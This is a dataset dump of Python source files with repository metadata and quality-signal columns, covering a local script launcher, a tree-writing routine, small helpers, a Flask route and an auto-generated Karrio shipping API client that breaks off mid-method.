hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
471426995eaaf7bd4a5f2aef19850f0764d972d5 | 138 | py | Python | abaqus_deploy/src/call_neuronalfem.py | miguelggaspar/neuronalFEM | 78e001b4306f39bf7e5d67361c67182a6a9b80e2 | [
"MIT"
] | null | null | null | abaqus_deploy/src/call_neuronalfem.py | miguelggaspar/neuronalFEM | 78e001b4306f39bf7e5d67361c67182a6a9b80e2 | [
"MIT"
] | null | null | null | abaqus_deploy/src/call_neuronalfem.py | miguelggaspar/neuronalFEM | 78e001b4306f39bf7e5d67361c67182a6a9b80e2 | [
"MIT"
] | null | null | null | import os
os.environ["PYTHONPATH"] = ""
os.system('python3 /home/miguel/Documents/tese/ViscoPlastic-ML/abaqus_deploy/src/neuronalfem.py')
| 34.5 | 97 | 0.782609 | 19 | 138 | 5.631579 | 0.894737 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.007634 | 0.050725 | 138 | 3 | 98 | 46 | 0.80916 | 0 | 0 | 0 | 0 | 0.333333 | 0.681159 | 0.550725 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.333333 | 0 | 0.333333 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 7 |
5b4c16ba47a6769fe41622c5257fced5c723f58a | 3,774 | py | Python | project/write_to_file.py | sharan-wisc/756-project | 37388cc74018811335b95a697199eed8935e4282 | [
"Apache-2.0"
] | null | null | null | project/write_to_file.py | sharan-wisc/756-project | 37388cc74018811335b95a697199eed8935e4282 | [
"Apache-2.0"
] | null | null | null | project/write_to_file.py | sharan-wisc/756-project | 37388cc74018811335b95a697199eed8935e4282 | [
"Apache-2.0"
] | null | null | null | def write_to_file(file_name, parent_child_node, child_parent_node, node_with_sink, child_parent_wl, sink_load, delay_sink):
node_print_left = {}
node_print_right = {}
node_print_left[0] = None
node_print_right[0] = None
write_file = open(file_name, 'w')
parent = parent_child_node.keys()[1]
(node_print_left, node_print_right) = print_left(parent, node_print_left, node_print_right, parent_child_node, child_parent_node, node_with_sink, write_file, child_parent_wl, sink_load, delay_sink)
return
def print_left(node, node_print_left, node_print_right, parent_child_node, child_parent_node, node_with_sink, write_file, child_parent_wl, sink_load, delay_sink):
if not node in node_with_sink:
write_file.write("( node")
write_file.write(str(node))
write_file.write("\t")
write_file.write(str(child_parent_wl[node]))
write_file.write("\n")
# print >> write_file, "(node", node,"\t", child_parent_wl[node]
node_print_left[node] = True
node_print_right[node] = None
node = parent_child_node[node][0]
(node_print_left, node_print_right) = print_left(node, node_print_left, node_print_right, parent_child_node, child_parent_node, node_with_sink, write_file, child_parent_wl, sink_load, delay_sink)
else:
write_file.write("\t< sink")
write_file.write(str(node))
write_file.write("\t")
write_file.write(str(child_parent_wl[node]))
write_file.write("\t")
write_file.write(str(delay_sink[node]))
write_file.write("\t")
write_file.write(str(sink_load[node]))
write_file.write(" >")
write_file.write("\n")
# print >> write_file, "\t< sink", node,"\t", child_parent_wl[node], "\t", delay_sink[node], "\t", sink_load[node], " >"
node_print_left[node] = True
node_print_right[node] = True
node = child_parent_node[node]
(node_print_left, node_print_right) = print_right(node, node_print_left, node_print_right, parent_child_node, child_parent_node, node_with_sink, write_file, child_parent_wl, sink_load, delay_sink)
return (node_print_left, node_print_right)
def print_right(node, node_print_left, node_print_right, parent_child_node, child_parent_node, node_with_sink, write_file, child_parent_wl, sink_load, delay_sink):
while ((node != 1) and (node in node_print_right.keys()) and node_print_right[node]):
parent = child_parent_node[node]
print >> write_file, ")"
if node == parent_child_node[parent][1]:
node_print_right[parent] = True
node = parent
if ((node ==1) and (node in node_print_right.keys()) and node_print_right[node]):
print >> write_file, ")"
node = parent_child_node[node][1]
if not node in node_with_sink:
if ((node in node_print_left.keys() and node_print_left[node] != True) or node not in node_print_left.keys()):
(node_print_left, node_print_right) = print_left(node, node_print_left, node_print_right, parent_child_node, child_parent_node, node_with_sink, write_file, child_parent_wl, sink_load, delay_sink)
else:
write_file.write("\t< sink")
write_file.write(str(node))
write_file.write("\t")
write_file.write(str(child_parent_wl[node]))
write_file.write("\t")
write_file.write(str(delay_sink[node]))
write_file.write("\t")
write_file.write(str(sink_load[node]))
write_file.write(" >")
write_file.write("\n")
# print >> write_file, "\t< sink", node,"\t", child_parent_wl[node], "\t", delay_sink[node], "\t", sink_load[node], " >"
node_print_left[node] = True
node_print_right[node] = True
parent = child_parent_node[node]
node_print_right[parent] = True
node = child_parent_node[node]
(node_print_left, node_print_right) = print_right(node, node_print_left, node_print_right, parent_child_node, child_parent_node, node_with_sink, write_file, child_parent_wl, sink_load, delay_sink)
return (node_print_left, node_print_right)
| 46.02439 | 198 | 0.757287 | 615 | 3,774 | 4.219512 | 0.055285 | 0.169942 | 0.134875 | 0.12447 | 0.91869 | 0.857418 | 0.814258 | 0.779191 | 0.765318 | 0.749133 | 0 | 0.002389 | 0.112878 | 3,774 | 81 | 199 | 46.592593 | 0.7727 | 0.080286 | 0 | 0.701493 | 0 | 0 | 0.014141 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.044776 | false | 0 | 0 | 0 | 0.089552 | 0.38806 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
5b7a17a18a43de86e67880ac6ecfc8cdf63d9234 | 41 | py | Python | cbox/lib/__init__.py | akashdhruv/BubbleBox | 65d0b4f740eb6a6ab984098da50f87eeb8ae3833 | [
"MIT"
] | null | null | null | cbox/lib/__init__.py | akashdhruv/BubbleBox | 65d0b4f740eb6a6ab984098da50f87eeb8ae3833 | [
"MIT"
] | 2 | 2021-11-11T05:35:58.000Z | 2022-02-13T17:00:18.000Z | cbox/lib/__init__.py | akashdhruv/BubbleBox | 65d0b4f740eb6a6ab984098da50f87eeb8ae3833 | [
"MIT"
] | null | null | null | from . import boost
from . import extern
| 13.666667 | 20 | 0.756098 | 6 | 41 | 5.166667 | 0.666667 | 0.645161 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.195122 | 41 | 2 | 21 | 20.5 | 0.939394 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
5b9095bf2e1b757bd814134e7b0c083862f4ccc8 | 44 | py | Python | src/craft_ml/utils/logger.py | OptimizationGuys/CraftML | df97e4fa5c3d85de3214e4bc41459b1f6872ba29 | [
"MIT"
] | 15 | 2021-01-31T09:19:19.000Z | 2022-01-10T11:23:00.000Z | src/craft_ml/utils/logger.py | OptimizationGuys/CraftML | df97e4fa5c3d85de3214e4bc41459b1f6872ba29 | [
"MIT"
] | 12 | 2021-01-31T18:32:15.000Z | 2021-03-08T10:11:07.000Z | src/craft_ml/utils/logger.py | OptimizationGuys/CraftML | df97e4fa5c3d85de3214e4bc41459b1f6872ba29 | [
"MIT"
] | 2 | 2021-02-18T17:36:49.000Z | 2021-05-16T10:40:31.000Z | import typing as t
class Logger:
pass
| 7.333333 | 18 | 0.681818 | 7 | 44 | 4.285714 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.295455 | 44 | 5 | 19 | 8.8 | 0.967742 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.333333 | 0.333333 | 0 | 0.666667 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 7 |
5bbf9cdebea37fed4ae5612f476a744ab0f3c181 | 95 | py | Python | app/Http/Controllers/Home.py | y80x86ol/docs | 349accddfdcd1ae5e7cb4040c4623983ef99f65f | [
"Apache-2.0"
] | null | null | null | app/Http/Controllers/Home.py | y80x86ol/docs | 349accddfdcd1ae5e7cb4040c4623983ef99f65f | [
"Apache-2.0"
] | null | null | null | app/Http/Controllers/Home.py | y80x86ol/docs | 349accddfdcd1ae5e7cb4040c4623983ef99f65f | [
"Apache-2.0"
] | null | null | null | from flask import render_template
def index():
return render_template("home/index.html")
| 15.833333 | 45 | 0.757895 | 13 | 95 | 5.384615 | 0.769231 | 0.4 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.147368 | 95 | 5 | 46 | 19 | 0.864198 | 0 | 0 | 0 | 0 | 0 | 0.157895 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | true | 0 | 0.333333 | 0.333333 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 1 | 1 | 0 | 0 | 8 |
f36b2ffe518d6e5b690e137676a94a9bcaf72dd6 | 123 | py | Python | netmom_check/utils/get_path.py | zommiommy/netmom_check | 3fff9e0b479d82b606b01cdf29a9a73c61fc625f | [
"MIT"
] | null | null | null | netmom_check/utils/get_path.py | zommiommy/netmom_check | 3fff9e0b479d82b606b01cdf29a9a73c61fc625f | [
"MIT"
] | null | null | null | netmom_check/utils/get_path.py | zommiommy/netmom_check | 3fff9e0b479d82b606b01cdf29a9a73c61fc625f | [
"MIT"
] | null | null | null | import os
def get_path():
return os.path.abspath(os.path.join(os.path.dirname(os.path.abspath(__file__)), "..", "..")) | 30.75 | 96 | 0.666667 | 19 | 123 | 4.052632 | 0.526316 | 0.311688 | 0.337662 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.097561 | 123 | 4 | 96 | 30.75 | 0.693694 | 0 | 0 | 0 | 0 | 0 | 0.032258 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | true | 0 | 0.333333 | 0.333333 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 1 | 0 | 0 | 0 | 8 |
f36dd1964b3358d5b0f10bbc0a16403c813657a9 | 46,126 | py | Python | karrio/api/proxy_api.py | karrioapi/karrio-python | 7b7e3b386016a138a5668644884a7a9fc497b15c | [
"MIT"
] | 1 | 2018-12-28T18:32:37.000Z | 2018-12-28T18:32:37.000Z | karrio/api/proxy_api.py | PurplShip/purplship-clients | 7b7e3b386016a138a5668644884a7a9fc497b15c | [
"MIT"
] | null | null | null | karrio/api/proxy_api.py | PurplShip/purplship-clients | 7b7e3b386016a138a5668644884a7a9fc497b15c | [
"MIT"
] | null | null | null | """
Karrio API
## API Reference Karrio is an open source multi-carrier shipping API that simplifies the integration of logistic carrier services. The Karrio API is organized around REST. Our API has predictable resource-oriented URLs, accepts JSON-encoded request bodies, returns JSON-encoded responses, and uses standard HTTP response codes, authentication, and verbs. The Karrio API differs for every account as we release new versions. These docs are customized to your version of the API. ## Versioning When backwards-incompatible changes are made to the API, a new, dated version is released. The current version is `2022.4`. Read our API changelog and to learn more about backwards compatibility. As a precaution, use API versioning to check a new API version before committing to an upgrade. ## Pagination All top-level API resources have support for bulk fetches via \"list\" API methods. For instance, you can list addresses, list shipments, and list trackers. These list API methods share a common structure, taking at least these two parameters: limit, and offset. Karrio utilizes offset-based pagination via the offset and limit parameters. Both parameters take a number as value (see below) and return objects in reverse chronological order. The offset parameter returns objects listed after an index. The limit parameter take a limit on the number of objects to be returned from 1 to 100. ```json { \"next\": \"/v1/shipments?limit=25&offset=25\", \"previous\": \"/v1/shipments?limit=25&offset=25\", \"results\": [ ] } ``` ## Environments The Karrio API offer the possibility to create and retrieve certain objects in `test_mode`. In development, it is therefore possible to add carrier connections, get live rates, buy labels, create trackers and schedule pickups in `test_mode`. # noqa: E501
The version of the OpenAPI document: 2022.4
Contact:
Generated by: https://openapi-generator.tech
"""
import re # noqa: F401
import sys # noqa: F401
from karrio.api_client import ApiClient, Endpoint as _Endpoint
from karrio.model_utils import ( # noqa: F401
check_allowed_values,
check_validations,
date,
datetime,
file_type,
none_type,
validate_and_convert_types
)
from karrio.model.error_response import ErrorResponse
from karrio.model.operation_response import OperationResponse
from karrio.model.pickup_cancel_request import PickupCancelRequest
from karrio.model.pickup_request import PickupRequest
from karrio.model.pickup_response import PickupResponse
from karrio.model.pickup_update_request import PickupUpdateRequest
from karrio.model.rate_request import RateRequest
from karrio.model.rate_response import RateResponse
from karrio.model.shipment_cancel_request import ShipmentCancelRequest
from karrio.model.shipping_request import ShippingRequest
from karrio.model.shipping_response import ShippingResponse
from karrio.model.tracking_response import TrackingResponse
class ProxyApi(object):
"""NOTE: This class is auto generated by OpenAPI Generator
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
self.buy_label_endpoint = _Endpoint(
settings={
'response_type': (ShippingResponse,),
'auth': [
'Token'
],
'endpoint_path': '/v1/proxy/shipping',
'operation_id': 'buy_label',
'http_method': 'POST',
'servers': None,
},
params_map={
'all': [
'data',
],
'required': [
'data',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'data':
(ShippingRequest,),
},
'attribute_map': {
},
'location_map': {
'data': 'body',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'application/json'
]
},
api_client=api_client
)
self.cancel_pickup_endpoint = _Endpoint(
settings={
'response_type': (OperationResponse,),
'auth': [
'Token'
],
'endpoint_path': '/v1/proxy/pickups/{carrier_name}/cancel',
'operation_id': 'cancel_pickup',
'http_method': 'POST',
'servers': None,
},
params_map={
'all': [
'carrier_name',
'data',
'test',
],
'required': [
'carrier_name',
'data',
],
'nullable': [
'test',
],
'enum': [
'carrier_name',
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
('carrier_name',): {
"ARAMEX": "aramex",
"AUSTRALIAPOST": "australiapost",
"CANADAPOST": "canadapost",
"CANPAR": "canpar",
"DHL_EXPRESS": "dhl_express",
"DHL_POLAND": "dhl_poland",
"DHL_UNIVERSAL": "dhl_universal",
"DICOM": "dicom",
"ESHIPPER": "eshipper",
"FEDEX": "fedex",
"FREIGHTCOM": "freightcom",
"GENERIC": "generic",
"PUROLATOR": "purolator",
"ROYALMAIL": "royalmail",
"SENDLE": "sendle",
"SF_EXPRESS": "sf_express",
"TNT": "tnt",
"UPS": "ups",
"USPS": "usps",
"USPS_INTERNATIONAL": "usps_international",
"YANWEN": "yanwen",
"YUNEXPRESS": "yunexpress"
},
},
'openapi_types': {
'carrier_name':
(str,),
'data':
(PickupCancelRequest,),
'test':
(bool, none_type,),
},
'attribute_map': {
'carrier_name': 'carrier_name',
'test': 'test',
},
'location_map': {
'carrier_name': 'path',
'data': 'body',
'test': 'query',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'application/json'
]
},
api_client=api_client
)
self.fetch_rates_endpoint = _Endpoint(
settings={
'response_type': (RateResponse,),
'auth': [
'Token'
],
'endpoint_path': '/v1/proxy/rates',
'operation_id': 'fetch_rates',
'http_method': 'POST',
'servers': None,
},
params_map={
'all': [
'data',
'test',
],
'required': [
'data',
],
'nullable': [
'test',
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'data':
(RateRequest,),
'test':
(bool, none_type,),
},
'attribute_map': {
'test': 'test',
},
'location_map': {
'data': 'body',
'test': 'query',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'application/json'
]
},
api_client=api_client
)
self.schedule_pickup_endpoint = _Endpoint(
settings={
'response_type': (PickupResponse,),
'auth': [
'Token'
],
'endpoint_path': '/v1/proxy/pickups/{carrier_name}',
'operation_id': 'schedule_pickup',
'http_method': 'POST',
'servers': None,
},
params_map={
'all': [
'carrier_name',
'data',
'test',
],
'required': [
'carrier_name',
'data',
],
'nullable': [
'test',
],
'enum': [
'carrier_name',
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
('carrier_name',): {
"ARAMEX": "aramex",
"AUSTRALIAPOST": "australiapost",
"CANADAPOST": "canadapost",
"CANPAR": "canpar",
"DHL_EXPRESS": "dhl_express",
"DHL_POLAND": "dhl_poland",
"DHL_UNIVERSAL": "dhl_universal",
"DICOM": "dicom",
"ESHIPPER": "eshipper",
"FEDEX": "fedex",
"FREIGHTCOM": "freightcom",
"GENERIC": "generic",
"PUROLATOR": "purolator",
"ROYALMAIL": "royalmail",
"SENDLE": "sendle",
"SF_EXPRESS": "sf_express",
"TNT": "tnt",
"UPS": "ups",
"USPS": "usps",
"USPS_INTERNATIONAL": "usps_international",
"YANWEN": "yanwen",
"YUNEXPRESS": "yunexpress"
},
},
'openapi_types': {
'carrier_name':
(str,),
'data':
(PickupRequest,),
'test':
(bool, none_type,),
},
'attribute_map': {
'carrier_name': 'carrier_name',
'test': 'test',
},
'location_map': {
'carrier_name': 'path',
'data': 'body',
'test': 'query',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'application/json'
]
},
api_client=api_client
)
self.track_shipment_endpoint = _Endpoint(
settings={
'response_type': (TrackingResponse,),
'auth': [
'Token'
],
'endpoint_path': '/v1/proxy/tracking/{carrier_name}/{tracking_number}',
'operation_id': 'track_shipment',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'tracking_number',
'carrier_name',
'test',
],
'required': [
'tracking_number',
'carrier_name',
],
'nullable': [
'test',
],
'enum': [
'carrier_name',
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
('carrier_name',): {
"ARAMEX": "aramex",
"AUSTRALIAPOST": "australiapost",
"CANADAPOST": "canadapost",
"CANPAR": "canpar",
"DHL_EXPRESS": "dhl_express",
"DHL_POLAND": "dhl_poland",
"DHL_UNIVERSAL": "dhl_universal",
"DICOM": "dicom",
"ESHIPPER": "eshipper",
"FEDEX": "fedex",
"FREIGHTCOM": "freightcom",
"GENERIC": "generic",
"PUROLATOR": "purolator",
"ROYALMAIL": "royalmail",
"SENDLE": "sendle",
"SF_EXPRESS": "sf_express",
"TNT": "tnt",
"UPS": "ups",
"USPS": "usps",
"USPS_INTERNATIONAL": "usps_international",
"YANWEN": "yanwen",
"YUNEXPRESS": "yunexpress"
},
},
'openapi_types': {
'tracking_number':
(str,),
'carrier_name':
(str,),
'test':
(bool, none_type,),
},
'attribute_map': {
'tracking_number': 'tracking_number',
'carrier_name': 'carrier_name',
'test': 'test',
},
'location_map': {
'tracking_number': 'path',
'carrier_name': 'path',
'test': 'query',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client
)
self.update_pickup_endpoint = _Endpoint(
settings={
'response_type': (PickupResponse,),
'auth': [
'Token'
],
'endpoint_path': '/v1/proxy/pickups/{carrier_name}',
'operation_id': 'update_pickup',
'http_method': 'PUT',
'servers': None,
},
params_map={
'all': [
'carrier_name',
'data',
'test',
],
'required': [
'carrier_name',
'data',
],
'nullable': [
'test',
],
'enum': [
'carrier_name',
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
('carrier_name',): {
"ARAMEX": "aramex",
"AUSTRALIAPOST": "australiapost",
"CANADAPOST": "canadapost",
"CANPAR": "canpar",
"DHL_EXPRESS": "dhl_express",
"DHL_POLAND": "dhl_poland",
"DHL_UNIVERSAL": "dhl_universal",
"DICOM": "dicom",
"ESHIPPER": "eshipper",
"FEDEX": "fedex",
"FREIGHTCOM": "freightcom",
"GENERIC": "generic",
"PUROLATOR": "purolator",
"ROYALMAIL": "royalmail",
"SENDLE": "sendle",
"SF_EXPRESS": "sf_express",
"TNT": "tnt",
"UPS": "ups",
"USPS": "usps",
"USPS_INTERNATIONAL": "usps_international",
"YANWEN": "yanwen",
"YUNEXPRESS": "yunexpress"
},
},
'openapi_types': {
'carrier_name':
(str,),
'data':
(PickupUpdateRequest,),
'test':
(bool, none_type,),
},
'attribute_map': {
'carrier_name': 'carrier_name',
'test': 'test',
},
'location_map': {
'carrier_name': 'path',
'data': 'body',
'test': 'query',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'application/json'
]
},
api_client=api_client
)
self.void_label_endpoint = _Endpoint(
settings={
'response_type': (OperationResponse,),
'auth': [
'Token'
],
'endpoint_path': '/v1/proxy/shipping/{carrier_name}/cancel',
'operation_id': 'void_label',
'http_method': 'POST',
'servers': None,
},
params_map={
'all': [
'carrier_name',
'data',
'test',
],
'required': [
'carrier_name',
'data',
],
'nullable': [
'test',
],
'enum': [
'carrier_name',
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
('carrier_name',): {
"ARAMEX": "aramex",
"AUSTRALIAPOST": "australiapost",
"CANADAPOST": "canadapost",
"CANPAR": "canpar",
"DHL_EXPRESS": "dhl_express",
"DHL_POLAND": "dhl_poland",
"DHL_UNIVERSAL": "dhl_universal",
"DICOM": "dicom",
"ESHIPPER": "eshipper",
"FEDEX": "fedex",
"FREIGHTCOM": "freightcom",
"GENERIC": "generic",
"PUROLATOR": "purolator",
"ROYALMAIL": "royalmail",
"SENDLE": "sendle",
"SF_EXPRESS": "sf_express",
"TNT": "tnt",
"UPS": "ups",
"USPS": "usps",
"USPS_INTERNATIONAL": "usps_international",
"YANWEN": "yanwen",
"YUNEXPRESS": "yunexpress"
},
},
'openapi_types': {
'carrier_name':
(str,),
'data':
(ShipmentCancelRequest,),
'test':
(bool, none_type,),
},
'attribute_map': {
'carrier_name': 'carrier_name',
'test': 'test',
},
'location_map': {
'carrier_name': 'path',
'data': 'body',
'test': 'query',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'application/json'
]
},
api_client=api_client
)
def buy_label(
self,
data,
**kwargs
):
"""Buy a shipment label # noqa: E501
Once the shipping rates are retrieved, provide the required info to submit the shipment by specifying your preferred rate. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.buy_label(data, async_req=True)
>>> result = thread.get()
Args:
data (ShippingRequest):
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
ShippingResponse
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_spec_property_naming'] = kwargs.get(
'_spec_property_naming', False
)
kwargs['_content_type'] = kwargs.get(
'_content_type')
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['data'] = \
data
return self.buy_label_endpoint.call_with_http_info(**kwargs)
def cancel_pickup(
self,
carrier_name,
data,
